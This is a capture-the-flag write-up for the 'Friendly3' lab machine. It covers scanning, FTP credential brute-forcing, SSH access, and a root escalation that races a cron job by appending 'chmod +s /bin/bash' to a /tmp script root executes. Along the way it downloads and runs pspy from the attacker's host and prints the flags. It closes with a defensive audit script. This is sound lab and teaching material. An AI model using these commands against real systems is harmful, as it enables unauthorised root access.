hmv[-_-]Friendly3

Friendly3

Information gathering

Port scanning

rustscan -a 172.20.10.5 -- -A
Open 172.20.10.5:21
Open 172.20.10.5:22
Open 172.20.10.5:80

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=
|   256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l
80/tcp open  http    syn-ack nginx 1.22.1
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Directory scanning

gobuster dir -u http://172.20.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png

Nothing was found.

Vulnerability discovery

Footprinting

Hi, sysadmin
I want you to know that I've just uploaded the new files into the FTP Server.
See you,
juan.

Brute-forcing FTP

Took a look at FTP and tried anonymous login, then tried these usernames:

admin
root
ftp
anonymous
juan
sysadmin
juan.

None of them worked, so I tried brute-forcing juan and sysadmin:

Got the user:

juan
alexis

Take a look:

┌──(kali💀kali)-[~/temp/Friendly3]
└─$ ftp 172.20.10.5                                             
Connected to 172.20.10.5.
220 (vsFTPd 3.0.3)
Name (172.20.10.5:kali): juan
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||51316|)
150 Here comes the directory listing.
drwxr-xr-x   14 0        0            4096 Jun 25  2023 .
drwxr-xr-x   14 0        0            4096 Jun 25  2023 ..
-rw-r--r--    1 0        0               0 Jun 25  2023 file1
-rw-r--r--    1 0        0               0 Jun 25  2023 file10
-rw-r--r--    1 0        0               0 Jun 25  2023 file100
-rw-r--r--    1 0        0               0 Jun 25  2023 file11
-rw-r--r--    1 0        0               0 Jun 25  2023 file12
-rw-r--r--    1 0        0               0 Jun 25  2023 file13
-rw-r--r--    1 0        0               0 Jun 25  2023 file14
-rw-r--r--    1 0        0               0 Jun 25  2023 file15
-rw-r--r--    1 0        0               0 Jun 25  2023 file16
-rw-r--r--    1 0        0               0 Jun 25  2023 file17
-rw-r--r--    1 0        0               0 Jun 25  2023 file18
-rw-r--r--    1 0        0               0 Jun 25  2023 file19
-rw-r--r--    1 0        0               0 Jun 25  2023 file2
-rw-r--r--    1 0        0               0 Jun 25  2023 file20
-rw-r--r--    1 0        0               0 Jun 25  2023 file21
-rw-r--r--    1 0        0               0 Jun 25  2023 file22
-rw-r--r--    1 0        0               0 Jun 25  2023 file23
-rw-r--r--    1 0        0               0 Jun 25  2023 file24
-rw-r--r--    1 0        0               0 Jun 25  2023 file25
-rw-r--r--    1 0        0               0 Jun 25  2023 file26
-rw-r--r--    1 0        0               0 Jun 25  2023 file27
-rw-r--r--    1 0        0               0 Jun 25  2023 file28
-rw-r--r--    1 0        0               0 Jun 25  2023 file29
-rw-r--r--    1 0        0               0 Jun 25  2023 file3
-rw-r--r--    1 0        0               0 Jun 25  2023 file30
-rw-r--r--    1 0        0               0 Jun 25  2023 file31
-rw-r--r--    1 0        0               0 Jun 25  2023 file32
-rw-r--r--    1 0        0               0 Jun 25  2023 file33
-rw-r--r--    1 0        0               0 Jun 25  2023 file34
-rw-r--r--    1 0        0               0 Jun 25  2023 file35
-rw-r--r--    1 0        0               0 Jun 25  2023 file36
-rw-r--r--    1 0        0               0 Jun 25  2023 file37
-rw-r--r--    1 0        0               0 Jun 25  2023 file38
-rw-r--r--    1 0        0               0 Jun 25  2023 file39
-rw-r--r--    1 0        0               0 Jun 25  2023 file4
-rw-r--r--    1 0        0               0 Jun 25  2023 file40
-rw-r--r--    1 0        0               0 Jun 25  2023 file41
-rw-r--r--    1 0        0               0 Jun 25  2023 file42
-rw-r--r--    1 0        0               0 Jun 25  2023 file43
-rw-r--r--    1 0        0               0 Jun 25  2023 file44
-rw-r--r--    1 0        0               0 Jun 25  2023 file45
-rw-r--r--    1 0        0               0 Jun 25  2023 file46
-rw-r--r--    1 0        0               0 Jun 25  2023 file47
-rw-r--r--    1 0        0               0 Jun 25  2023 file48
-rw-r--r--    1 0        0               0 Jun 25  2023 file49
-rw-r--r--    1 0        0               0 Jun 25  2023 file5
-rw-r--r--    1 0        0               0 Jun 25  2023 file50
-rw-r--r--    1 0        0               0 Jun 25  2023 file51
-rw-r--r--    1 0        0               0 Jun 25  2023 file52
-rw-r--r--    1 0        0               0 Jun 25  2023 file53
-rw-r--r--    1 0        0               0 Jun 25  2023 file54
-rw-r--r--    1 0        0               0 Jun 25  2023 file55
-rw-r--r--    1 0        0               0 Jun 25  2023 file56
-rw-r--r--    1 0        0               0 Jun 25  2023 file57
-rw-r--r--    1 0        0               0 Jun 25  2023 file58
-rw-r--r--    1 0        0               0 Jun 25  2023 file59
-rw-r--r--    1 0        0               0 Jun 25  2023 file6
-rw-r--r--    1 0        0               0 Jun 25  2023 file60
-rw-r--r--    1 0        0               0 Jun 25  2023 file61
-rw-r--r--    1 0        0               0 Jun 25  2023 file62
-rw-r--r--    1 0        0               0 Jun 25  2023 file63
-rw-r--r--    1 0        0               0 Jun 25  2023 file64
-rw-r--r--    1 0        0               0 Jun 25  2023 file65
-rw-r--r--    1 0        0               0 Jun 25  2023 file66
-rw-r--r--    1 0        0               0 Jun 25  2023 file67
-rw-r--r--    1 0        0               0 Jun 25  2023 file68
-rw-r--r--    1 0        0               0 Jun 25  2023 file69
-rw-r--r--    1 0        0               0 Jun 25  2023 file7
-rw-r--r--    1 0        0               0 Jun 25  2023 file70
-rw-r--r--    1 0        0               0 Jun 25  2023 file71
-rw-r--r--    1 0        0               0 Jun 25  2023 file72
-rw-r--r--    1 0        0               0 Jun 25  2023 file73
-rw-r--r--    1 0        0               0 Jun 25  2023 file74
-rw-r--r--    1 0        0               0 Jun 25  2023 file75
-rw-r--r--    1 0        0               0 Jun 25  2023 file76
-rw-r--r--    1 0        0               0 Jun 25  2023 file77
-rw-r--r--    1 0        0               0 Jun 25  2023 file78
-rw-r--r--    1 0        0               0 Jun 25  2023 file79
-rw-r--r--    1 0        0               0 Jun 25  2023 file8
-rw-r--r--    1 0        0              36 Jun 25  2023 file80
-rw-r--r--    1 0        0               0 Jun 25  2023 file81
-rw-r--r--    1 0        0               0 Jun 25  2023 file82
-rw-r--r--    1 0        0               0 Jun 25  2023 file83
-rw-r--r--    1 0        0               0 Jun 25  2023 file84
-rw-r--r--    1 0        0               0 Jun 25  2023 file85
-rw-r--r--    1 0        0               0 Jun 25  2023 file86
-rw-r--r--    1 0        0               0 Jun 25  2023 file87
-rw-r--r--    1 0        0               0 Jun 25  2023 file88
-rw-r--r--    1 0        0               0 Jun 25  2023 file89
-rw-r--r--    1 0        0               0 Jun 25  2023 file9
-rw-r--r--    1 0        0               0 Jun 25  2023 file90
-rw-r--r--    1 0        0               0 Jun 25  2023 file91
-rw-r--r--    1 0        0               0 Jun 25  2023 file92
-rw-r--r--    1 0        0               0 Jun 25  2023 file93
-rw-r--r--    1 0        0               0 Jun 25  2023 file94
-rw-r--r--    1 0        0               0 Jun 25  2023 file95
-rw-r--r--    1 0        0               0 Jun 25  2023 file96
-rw-r--r--    1 0        0               0 Jun 25  2023 file97
-rw-r--r--    1 0        0               0 Jun 25  2023 file98
-rw-r--r--    1 0        0               0 Jun 25  2023 file99
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold10
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold11
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold12
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold13
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold14
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold15
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold4
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold5
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold6
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold7
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold8
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold9
-rw-r--r--    1 0        0              58 Jun 25  2023 fole32
226 Directory send OK.
ftp> get file80
local: file80 remote: file80
229 Entering Extended Passive Mode (|||21632|)
150 Opening BINARY mode data connection for file80 (36 bytes).
100% |***********************************************************************************************************|    36        0.39 KiB/s    00:00 ETA
226 Transfer complete.
36 bytes received in 00:00 (0.38 KiB/s)
ftp> get fole32
local: fole32 remote: fole32
229 Entering Extended Passive Mode (|||14269|)
150 Opening BINARY mode data connection for fole32 (58 bytes).
100% |***********************************************************************************************************|    58       92.09 KiB/s    00:00 ETA
226 Transfer complete.
58 bytes received in 00:00 (55.15 KiB/s)
ftp> get fold10
local: fold10 remote: fold10
229 Entering Extended Passive Mode (|||46237|)
550 Failed to open file.
ftp> cd fold10
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||38694|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 25  2023 .
drwxr-xr-x   14 0        0            4096 Jun 25  2023 ..
-rw-r--r--    1 0        0             163 Jun 25  2023 .test.txt
226 Directory send OK.
ftp> get .test.txt
local: .test.txt remote: .test.txt
229 Entering Extended Passive Mode (|||45645|)
150 Opening BINARY mode data connection for .test.txt (163 bytes).
100% |***********************************************************************************************************|   163        1.78 KiB/s    00:00 ETA
226 Transfer complete.
163 bytes received in 00:00 (1.77 KiB/s)
ftp> exit
221 Goodbye.
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat file80       
Hi, I'm the sysadmin. I am bored...

┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat fole32 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba

┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat .test.txt      
Hi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...

What is this? Not useful for now, it seems. Next, try brute-forcing SSH and, at the same time, check whether the FTP password is reused:

Looks like brute-forcing isn't needed after all, but leave it running in the background anyway. Wait, here it comes:

Privilege escalation

Information gathering

juan@friendly3:~$ ls -la
total 28
drwxr-xr-x  3 juan juan 4096 Jul 17  2023 .
drwxr-xr-x  4 root root 4096 Jun 25  2023 ..
lrwxrwxrwx  1 root root    9 Jun 25  2023 .bash_history -> /dev/null
-rw-r--r--  1 juan juan  220 Apr 23  2023 .bash_logout
-rw-r--r--  1 juan juan 3526 Apr 23  2023 .bashrc
drwxr-xr-x 14 root root 4096 Jun 25  2023 ftp
-rw-r--r--  1 juan juan  807 Apr 23  2023 .profile
-r--------  1 juan juan   33 Jul 17  2023 user.txt
juan@friendly3:~$ cat user.txt 
cb40b159c8086733d57280de3f97de30
juan@friendly3:~$ find . -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
ftp:x:100:108:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
juan:x:1001:1001::/home/juan:/bin/bash
messagebus:x:101:109::/nonexistent:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
blue:x:1002:1002::/home/blue:/bin/bash
juan@friendly3:~$ cd ..
juan@friendly3:/home$ ls -la
total 16
drwxr-xr-x  4 root root 4096 Jun 25  2023 .
drwxr-xr-x 18 root root 4096 Jun 25  2023 ..
drwxr-xr-x  2 blue blue 4096 Jun 25  2023 blue
drwxr-xr-x  3 juan juan 4096 Jul 17  2023 juan
juan@friendly3:/home$ cd blue
juan@friendly3:/home/blue$ ls -la
total 20
drwxr-xr-x 2 blue blue 4096 Jun 25  2023 .
drwxr-xr-x 4 root root 4096 Jun 25  2023 ..
lrwxrwxrwx 1 root root    9 Jun 25  2023 .bash_history -> /dev/null
-rw-r--r-- 1 blue blue  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 blue blue 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 blue blue  807 Apr 23  2023 .profile
juan@friendly3:/home/blue$ find / -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:/home/blue$ find / -user blue -name *.txt 2>/dev/null
juan@friendly3:/home/blue$ find / -user juan -name *.txt 2>/dev/null
/home/juan/user.txt
juan@friendly3:/home/blue$ find / -user root -name *.txt 2>/dev/null
/home/juan/ftp/fold8/passwd.txt
/home/juan/ftp/fold10/.test.txt
/home/juan/ftp/fold5/yt.txt
/var/cache/dictionaries-common/ispell-dicts-list.txt
/usr/share/vim/vim90/doc/help.txt
/usr/share/doc/publicsuffix/examples/test_psl.txt
/usr/share/doc/openssl/fingerprints.txt
/usr/share/doc/openssl/HOWTO/keys.txt
/usr/share/doc/vsftpd/examples/VIRTUAL_USERS/logins.txt
/usr/share/doc/libdb5.3/build_signature_amd64.txt
/usr/share/doc/mount/mount.txt
/usr/share/doc/util-linux/howto-debug.txt
/usr/share/doc/util-linux/release-schedule.txt
/usr/share/doc/util-linux/howto-man-page.txt
/usr/share/doc/util-linux/col.txt
/usr/share/doc/util-linux/pg.txt
/usr/share/doc/util-linux/howto-tests.txt
/usr/share/doc/util-linux/getopt.txt
/usr/share/doc/util-linux/getopt_changelog.txt
/usr/share/doc/util-linux/cal.txt
/usr/share/doc/util-linux/hwclock.txt
/usr/share/doc/util-linux/howto-build-sys.txt
/usr/share/doc/util-linux/PAM-configuration.txt
/usr/share/doc/util-linux/howto-compilation.txt
/usr/share/doc/util-linux/mount.txt
/usr/share/doc/util-linux/deprecated.txt
/usr/share/doc/util-linux/modems-with-agetty.txt
/usr/share/doc/util-linux/blkid.txt
/usr/share/doc/util-linux/00-about-docs.txt
/usr/share/doc/busybox/syslog.conf.txt
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold8/passwd.txt
[passwd.txt contains only a 21-line braille-art picture; no credentials]
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold5/yt.txt
Thanks to all my YT subscribers!

Continuing with information gathering:

juan@friendly3:/home/blue$ sudo -l
-bash: sudo: command not found
juan@friendly3:/home/blue$ cd /
juan@friendly3:/$ ls -la
total 68
drwxr-xr-x  18 root root  4096 Jun 25  2023 .
drwxr-xr-x  18 root root  4096 Jun 25  2023 ..
lrwxrwxrwx   1 root root     7 Jun 25  2023 bin -> usr/bin
drwxr-xr-x   3 root root  4096 Jun 25  2023 boot
drwxr-xr-x  17 root root  3300 Apr 14 05:34 dev
drwxr-xr-x  63 root root  4096 Apr 14 05:34 etc
drwxr-xr-x   4 root root  4096 Jun 25  2023 home
lrwxrwxrwx   1 root root    29 Jun 25  2023 initrd.img -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx   1 root root    29 Jun 25  2023 initrd.img.old -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx   1 root root     7 Jun 25  2023 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Jun 25  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 Jun 25  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 Jun 25  2023 libx32 -> usr/libx32
drwx------   2 root root 16384 Jun 25  2023 lost+found
drwxr-xr-x   3 root root  4096 Jun 25  2023 media
drwxr-xr-x   2 root root  4096 Jun 25  2023 mnt
drwxr-xr-x   2 root root  4096 Jun 25  2023 opt
dr-xr-xr-x 140 root root     0 Apr 14 05:33 proc
drwx------   4 root root  4096 Jul 17  2023 root
drwxr-xr-x  17 root root   540 Apr 14 06:04 run
lrwxrwxrwx   1 root root     8 Jun 25  2023 sbin -> usr/sbin
drwxr-xr-x   3 root root  4096 Jun 25  2023 srv
dr-xr-xr-x  13 root root     0 Apr 14 05:33 sys
drwxrwxrwt   7 root root  4096 Apr 14 06:09 tmp
drwxr-xr-x  14 root root  4096 Jun 25  2023 usr
drwxr-xr-x  12 root root  4096 Jun 25  2023 var
lrwxrwxrwx   1 root root    26 Jun 25  2023 vmlinuz -> boot/vmlinuz-6.1.0-9-amd64
lrwxrwxrwx   1 root root    26 Jun 25  2023 vmlinuz.old -> boot/vmlinuz-6.1.0-9-amd64
juan@friendly3:/$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6    * * 7   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6    1 * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
cat: /etc/cron.weekly: Is a directory
cat: /etc/cron.yearly: Is a directory
juan@friendly3:/$ cd opt
juan@friendly3:/opt$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Jun 25  2023 .
drwxr-xr-x 18 root root 4096 Jun 25  2023 ..
-rwxr-xr-x  1 root root  190 Jun 25  2023 check_for_install.sh
juan@friendly3:/opt$ cat check_for_install.sh 
#!/bin/bash

/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash

chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash

/bin/bash /tmp/a.bash

rm -rf /tmp/a.bash
juan@friendly3:/opt$ cd /tmp
juan@friendly3:/tmp$ wget http://172.20.10.8:8888/pspy64
-bash: wget: command not found
juan@friendly3:/tmp$ busybox wget http://172.20.10.8:8888/pspy64
Connecting to 172.20.10.8:8888 (172.20.10.8:8888)
saving to 'pspy64'
pspy64               100% |***********************************************************************| 4364k  0:00:00 ETA
'pspy64' saved
juan@friendly3:/tmp$ chmod +x pspy64
juan@friendly3:/tmp$ ./pspy64

Found a script that looks exploitable. Upload pspy64 to check whether it runs as a scheduled task:

It is indeed a cron job. Try writing a script that squeezes into the window between the download and the execution:

#!/bin/sh
while true:
do
echo "chmod + s /bin/bash" >> a.bash
done
juan@friendly3:/tmp$ ./exp.sh 
./exp.sh: line 1: 1:: command not found

What? ("while true:" is Python syntax, not sh; the shell form is "while true; do ... done".) Just run it directly on the command line then:

while true;do echo 'chmod +s /bin/bash' >> a.bash;done

Got the shell!!

juan@friendly3:/tmp$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23  2023 /bin/bash
juan@friendly3:/tmp$ while true;do echo 'chmod +s /bin/bash' >> a.bash;done
^Cchmod +s /bin/bash
juan@friendly3:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash
juan@friendly3:/tmp$ bash -p
bash-5.2# cd /root
bash-5.2# ls -la
total 40
drwx------  4 root root 4096 Jul 17  2023 .
drwxr-xr-x 18 root root 4096 Jun 25  2023 ..
lrwxrwxrwx  1 root root    9 Jun 25  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-r-xr-xr-x  1 root root  509 Jun 25  2023 interfaces.sh
-rw-------  1 root root   20 Jun 25  2023 .lesshst
drwxr-xr-x  3 root root 4096 Jun 25  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-r--------  1 root root   33 Jul 17  2023 root.txt
-rw-r--r--  1 root root   66 Jun 25  2023 .selected_editor
drwx------  2 root root 4096 Jun 25  2023 .ssh
bash-5.2# cat root.txt 
eb9748b67f25e6bd202e5fa25f534d51
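The root cron script combined a fixed filename in /tmp, a chmod +w, and execution as root, which is exactly the window the append loop above exploited. As an added example (not from the original write-up or the box's own files), this shell script audits a script for that pattern and shows the hardened way to stage a download; SAMPLE_SCRIPT, audit_script, is_private and stage_and_run are names chosen here, and a local file stands in for the curl download so it runs offline.

```shell
#!/bin/sh
# Added example (not from the write-up): a static audit for the weak pattern in
# /opt/check_for_install.sh, and a hardened way to stage a downloaded script so a
# local user cannot pre-create or append to the file root is about to execute.
# SAMPLE_SCRIPT is reconstructed from the write-up; stage_and_run takes a local
# file in place of the curl download so everything runs offline.

SAMPLE_SCRIPT='#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash'

WORLD_WRITABLE='/(tmp|var/tmp|dev/shm)/'

# audit_script FILE: print one line per risky construct found (nothing if clean).
audit_script() {
    f="$1"
    # A fixed name in a world-writable directory: any local user can create the
    # file first (root's '>' then writes into it) or keep appending while it runs.
    grep -Eq ">[[:space:]]*$WORLD_WRITABLE" "$f" &&
        echo "fixed temp path written with a shell redirect"
    grep -Eq "(bash|sh)[[:space:]]+$WORLD_WRITABLE" "$f" &&
        echo "script executed from a world-writable directory"
    grep -Eq 'chmod[[:space:]]+[ugoa]*\+[rx]*w' "$f" &&
        echo "downloaded file made writable before execution"
    return 0
}

# is_private FILE: owned by the invoking user and not writable by group or other.
is_private() {
    [ -f "$1" ] || return 1
    [ -z "$(find "$1" \( ! -user "$(id -un)" -o -perm -002 -o -perm -020 \))" ]
}

# stage_and_run SOURCE: copy the payload into a fresh mode-700 directory with an
# unpredictable name, lock its mode, re-check ownership, then execute and clean up.
stage_and_run() {
    src="$1"
    dir=$(mktemp -d "${TMPDIR:-/tmp}/install.XXXXXX") || return 1
    chmod 700 "$dir" || { rm -rf "$dir"; return 1; }
    cp "$src" "$dir/payload.sh" && chmod 500 "$dir/payload.sh" ||
        { rm -rf "$dir"; return 1; }
    if ! is_private "$dir/payload.sh"; then
        echo "refusing to run: payload is not private" >&2
        rm -rf "$dir"; return 1
    fi
    sh "$dir/payload.sh" && rc=0 || rc=$?
    rm -rf "$dir"
    return "$rc"
}

# Demo: audit the write-up's script (prints three findings).
demo=$(mktemp) && printf '%s\n' "$SAMPLE_SCRIPT" > "$demo"
audit_script "$demo"
rm -f "$demo"
```

Running the audit over /opt/check_for_install.sh as shown in the session would report all three findings; the staged variant leaves no file a non-root user can reach before it is executed.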